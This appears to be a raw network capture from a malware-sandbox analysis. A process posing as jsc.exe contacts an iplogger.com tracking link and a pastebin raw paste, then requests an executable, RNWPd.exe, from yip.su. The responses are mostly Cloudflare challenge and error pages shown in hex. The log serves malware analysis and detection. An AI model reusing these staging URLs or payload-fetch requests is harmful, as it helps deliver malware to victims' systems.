                                    Data Ascii: v6NV9WVkYLamhDjA54ZaoJMlvxjwuJtM8VKFHD6IGtFWu0rVb3twak1Gaw_Djv.AGk.b_1wPyHQmybVF86wtDpm7B9wk69ltt5vBlf3A12YXvGoYYK0kbyd5ql.vlG_lcsS_LROQSWUa4T.g9JMFZ1gbLNMTEbaRH6jjiEnk821qBuFHsKoYxl7Bqafnba1fNk1GSB5YETm8mOlpjr.AXMrYr6A5BAAL2sMmDchREhYvWulb8LEtx66FQ5WUXUs


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    67192.168.2.549794172.67.188.1784437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:22 UTC68OUTGET /1djqU4 HTTP/1.1
                                    Host: iplogger.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:22 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:22 UTC691INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 75 34 34 6b 42 64 47 67 5a 4b 6e 31 46 48 6e 2b 76 78 42 50 77 4b 31 4c 2b 54 64 4c 2b 69 65 36 71 51 65 4c 66 4f 4f 73 66 32 6c 63 63 48 66 46 72 51 63 30 7a 65 31 65 44 66 47 65 41 4e 2b 76 73 66 67 4e 67 4f 5a 53 46 69 66 56 41 6d 4a 35 77 70 67 56 69 4c 49 73 4b 6a 2b 77 4e 75 39 6d 50 32 69 31 6d 30 6b 32 64 35 6f 3d 24 7a 5a 6f 75 62 71 56 44 64 45 72 50 5a 52 37 6c 58 66 66 56 5a 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: u44kBdGgZKn1FHn+vxBPwK1L+TdL+ie6qQeLfOOsf2lccHfFrQc0ze1eDfGeAN+vsfgNgOZSFifVAmJ5wpgViLIsKj+wNu9mP2i1m0k2d5o=$zZoubqVDdErPZR7lXffVZQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:11:22 UTC1369INData Raw: 33 64 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfd<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:11:22 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:11:22 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:11:22 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:11:22 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:11:22 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:11:22 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:11:22 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 69 70 6c 6f 67 67 65 72 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 31 33 35 38 37 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 66 65 30 38 39 34 31 37 32 63 32 27 2c 63 48 61 73 68 3a 20 27 63 61 66 63 63 65 36 32 36 36 34 30 65 32 65 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 31 64 6a 71 55 34 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 5f 77 67 70 5a 43 70 30 6c 32 53 56 6f 77 63 59 63 79 6b 31 6d 70 69 49 30 68 62 75 64 57 54 32 65 78 41 43 78 44 71 6d 4c 41 30 2d 31 37 32 33 39 33 32 36 38 32 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "iplogger.com",cType: 'managed',cNounce: '13587',cRay: '8b4cffe0894172c2',cHash: 'cafcce626640e2e',cUPMDTk: "\/1djqU4?__cf_chl_tk=_wgpZCp0l2SVowcYcyk1mpiI0hbudWT2exACxDqmLA0-1723932682-0.0.1.1-4137",cFPWv: 'g',cT
                                    2024-08-17 22:11:22 UTC1369INData Raw: 65 4b 4a 4d 6a 43 77 6b 6b 69 72 77 73 2e 42 6b 48 75 6e 6a 65 46 59 66 52 6e 4d 63 6e 6e 4d 5a 31 6c 5f 52 6f 2e 4f 42 2e 4d 42 2e 55 4b 4b 4f 46 30 54 65 6a 62 46 75 59 76 45 4d 6e 79 57 58 65 4d 6f 4f 51 36 72 41 38 72 55 73 51 43 32 75 75 52 44 45 49 51 4d 50 39 4d 62 69 63 79 4b 39 4c 77 4d 6f 4e 5a 64 42 62 53 34 4f 47 6c 68 63 73 6d 41 37 6e 4c 71 36 4e 64 51 67 62 6c 56 43 62 75 72 59 71 42 36 53 36 6f 4b 57 6d 35 54 6a 4e 39 67 2e 69 54 77 67 67 56 41 34 4a 2e 62 69 30 44 55 44 73 5f 70 32 47 56 75 65 64 6b 74 61 5f 46 30 31 6a 74 6d 6a 48 58 34 6a 5f 4e 73 61 4e 39 66 35 33 4f 61 66 6c 35 59 4b 36 71 6e 4f 6e 44 48 2e 55 53 32 32 6f 46 54 62 37 66 38 6e 48 51 4a 6a 52 36 6d 6b 30 66 55 4b 5f 62 45 74 5f 6e 69 75 6f 6d 67 52 76 77 6d 7a 55 44 74
                                    Data Ascii: eKJMjCwkkirws.BkHunjeFYfRnMcnnMZ1l_Ro.OB.MB.UKKOF0TejbFuYvEMnyWXeMoOQ6rA8rUsQC2uuRDEIQMP9MbicyK9LwMoNZdBbS4OGlhcsmA7nLq6NdQgblVCburYqB6S6oKWm5TjN9g.iTwggVA4J.bi0DUDs_p2GVuedkta_F01jtmjHX4j_NsaN9f53Oafl5YK6qnOnDH.US22oFTb7f8nHQJjR6mk0fUK_bEt_niuomgRvwmzUDt


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    68192.168.2.549795104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:23 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:23 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:11:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cffe58c3b41d9-EWR
                                    2024-08-17 22:11:23 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:11:23 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:11:23 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:11:23 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:11:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    69192.168.2.549796188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:11:23 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:23 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:23 UTC683INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 79 33 77 58 6e 7a 74 6f 7a 6f 69 33 6e 64 53 57 2f 4b 4e 39 42 51 77 35 59 58 42 61 35 76 4c 6e 53 62 37 77 38 6a 67 56 56 66 55 51 6c 7a 42 38 4a 7a 43 63 46 75 4e 73 6c 4c 6f 32 51 6d 6c 2f 47 51 2b 65 6c 48 59 41 58 74 64 4a 46 31 62 79 56 49 32 38 52 45 63 66 36 64 76 6f 44 65 45 49 39 4a 68 47 2f 6b 37 46 49 35 45 3d 24 47 44 76 58 4d 6f 6b 52 6f 31 59 55 74 76 48 72 6e 6a 45 41 71 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: y3wXnztozoi3ndSW/KN9BQw5YXBa5vLnSb7w8jgVVfUQlzB8JzCcFuNslLo2Qml/GQ+elHYAXtdJF1byVI28REcf6dvoDeEI9JhG/k7FI5E=$GDvXMokRo1YUtvHrnjEAqw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
